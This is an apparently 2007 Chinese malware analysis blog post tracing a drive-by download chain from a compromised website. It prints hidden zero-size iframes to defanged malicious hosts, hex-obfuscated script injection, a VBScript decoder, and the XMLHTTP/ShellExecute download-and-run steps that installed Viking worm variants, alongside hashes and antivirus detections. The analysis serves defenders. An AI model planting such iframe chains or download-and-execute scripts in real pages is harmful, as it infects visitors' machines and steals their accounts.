endurer 原创
2007-06-07 第1版
有网友说他的电脑打开某个网站后不久,杀毒软件的实时监控被关闭,系统时间被修改,接着安装各种网络游戏和聊天账号的盗号木马。
检查该网站首页代码,发现:
/---
if(parent.window.opener) parent.window.opener.location='hxxp://aa***a.sqr***s11**0.com/';
……(略)……
<SCRIPT src="hxxp://m***a.china**s*es*e.net/top.js"></SCRIPT>
---/
hxxp://sqr***s1**.s**e*771.com/ 包含代码:
/---
<iframe src="hxxp://m***a.china**s*es*e.net/110.htm" width="0" height="0" frameborder="0"></iframe>
---/
110.htm包含代码:
/---
<iframe src="hxxp://wg***.72***9*72.com/index.htm" width="0" height="0" frameborder="0"></iframe>
---/
index.htm包含代码:
/---
<iframe src="hxxp://union**.0***kis.com/in.htm?7141" width="0" height="0" frameborder="0"></iframe>
---/
in.htm?7141 包含代码:
/---
<script src=css.js></script>
<html>
<title>
test
</title>
<body>
<iframe src=test.htm width=0 height=0></iframe>
test
</body>
</html>
---/
css.js 的内容为用eval()执行自定义函数,经过2次解密,得到JavaScript代码,利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 love.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';}
---/
生成,即***.exe(其中*为数字),然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/***.exe 来运行。
test.htm 包含代码:
/---
<head>
<title>test</title>
<script src="test.js"></script>
</head>
<script>
exec();
</script>
</body>
---/
test.js 的内容未加密,使用ActiveXObject("ThunderServer.webThunder.1")下载 love.exe,保存到 c:/,并使用定时器来运行。
文件说明符 : D:/test/love.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-6 21:41:28
修改时间 : 2007-6-6 21:41:30
访问时间 : 2007-6-6 0:0:0
大小 : 95232 字节 93.0 KB
MD5 : 0b75d7947a9ac806318170a2cd45188a
Kaspersky 报为 Worm.Win32.Viking.lm,瑞星报为 Worm.Viking.tc
Scanned file: love.exe - Infected |
love.exe - infected by Worm.Win32.Viking.lm Statistics: |
Known viruses: | 340918 | Updated: | 06-06-2007 |
File size (Kb): | 93 | Virus bodies: | 1 |
Files: | 1 | Warnings: | 0 |
Archives: | 0 | Suspicious: | 0 |
hxxp://m***a.china**s*es*e.net/top.js 的代码比较少见:
/---
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"]("/x3c……(略)……/x3e");
……(略)……
window["/x64……(略)……/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c///x70/x3e");
……(略)……
---/
解密为HTML代码:
/---
<iframe width='0' height='0' src='hxxp://m***a.china**s*es*e.net/1100.htm'></iframe><iframe width='0' height='0' src='hxxp://9.72972.com/index.html'></iframe><iframe width='0' height='0' src='hxxp://wg***.72***9*72.com/'></iframe><p align="center">
<iframe frameborder=no border=0 marginwidth=0 marginheight=0 scrolling=no width=760 height=80 src=hxxp://m***a.china**s*es*e.net/110.htm target="_blank" name="I1"></iframe>
</p>
---/
1100.htm 的内容为 VBScript 脚本代码,功能是使用自定义函数:
/---
function rechange(k)
s=Split(k,Chr(-24081))
t=""
For i = 0 To UBound(s)
kellav=eval(s(i))
t=t+Chr(kellav)
Next
rechange=t
End Function
---/
解密变量:t="68★105★109……(略)……★13★10",然后用execute()执行。
解密后的t值为VBScript 脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 123.exe,保存IE临时文件夹下,文件名为 HbSTWgP.com,创建文件 PDoQmyN.vbs,内容为:
/---
Set Shell = CreateObject("WScript.Shell")
Shell.Run ("IE临时文件夹下,文件名为 HbSTWgP.com")
Set Shell = Nothing
---/
通过Shell.Application 对象 Run 的 ShellExecute 方法执行PDoQmyN.vbs,从而运行HbSTWgP.com。
文件说明符 : D:/test/123.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-6 22:25:23
修改时间 : 2007-6-6 22:25:24
访问时间 : 2007-6-6 0:0:0
大小 : 25291 字节 24.715 KB
MD5 : 56c51cac7f6301be1b3c395d7bd226b8
Kaspersky 报为 Virus.Win32.AutoRun.f
Scanned file: 123.exe - Infected |
123.exe - infected by Virus.Win32.AutoRun.f Statistics: |
Known viruses: | 340941 | Updated: | 06-06-2007 |
File size (Kb): | 25 | Virus bodies: | 1 |
Files: | 1 | Warnings: | 0 |
Archives: | 0 | Suspicious: | 0 |
hxxp://9.72972.com/index.html 包含代码:
/---
<iframe src="hxxp://www.p*u**m*a1***64.com/p*u**/8549647.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://s***w***k*ee.com/aacc.htm?23" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.p*u**m*a1***64.com/p*u**/8549647.htm 包含代码:
/---
<SCRIPT language="Jscript.encode" src=164.js></script>
---/
hxxp://www.p*u**m*a1***64.com/p*u**/164.js
的内容为用eval()执行自定义函数,经过3次解密,得到JavaScript代码,利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 1.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';}
---/
生成,即***.exe(其中*为数字),然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/***.exe 来运行。
文件说明符 : D:/test/1.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-6 22:30:27
修改时间 : 2007-6-6 22:30:28
访问时间 : 2007-6-6 0:0:0
大小 : 95232 字节 93.0 KB
MD5 : f13950bd6b6c31e10a8c66c5c3141aeb
Kaspersky 报为 Worm.Win32.Viking.lr,瑞星报为 Worm.Viking.te
Scanned file: 1.exe - Infected |
1.exe - infected by Worm.Win32.Viking.lr Statistics: |
Known viruses: | 340941 | Updated: | 06-06-2007 |
File size (Kb): | 93 | Virus bodies: | 1 |
Files: | 1 | Warnings: | 0 |
Archives: | 0 | Suspicious: | 0 |
hxxp://s***w***k*ee.com/aacc.htm?23 包含代码:
/---
<script src=windows.js></script>
---/
windows.js 的内容为用eval()执行自定义函数,解密后得到JavaScript代码,利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xz.exe,保存到%windir%,文件名由自定义函数:
/---
function Ks(vpn){var Num=Math.random()*vpn;return'~Temp'+Math.round(Num)+'.tmp'}
---/
生成,即~Temp***..tmp(其中*为数字),然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/***.exe 来运行。
文件说明符 : D:/test/xz.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-6 22:39:49
修改时间 : 2007-6-6 22:39:50
访问时间 : 2007-6-6 0:0:0
大小 : 105472 字节 103.0 KBa
MD5 : 692bdc6c4e92c7cc44fd623eaa8e1ddc
Kaspersky 报为 Worm.Win32.Viking.bd,瑞星报为 Worm.Viking.el
Scanned file: xz.exe - Infected |
xz.exe - infected by Worm.Win32.Viking.bd Statistics: |
Known viruses: | 340941 | Updated: | 06-06-2007 |
File size (Kb): | 103 | Virus bodies: | 1 |
Files: | 1 | Warnings: | 0 |
Archives: | 0 | Suspicious: | 0 |
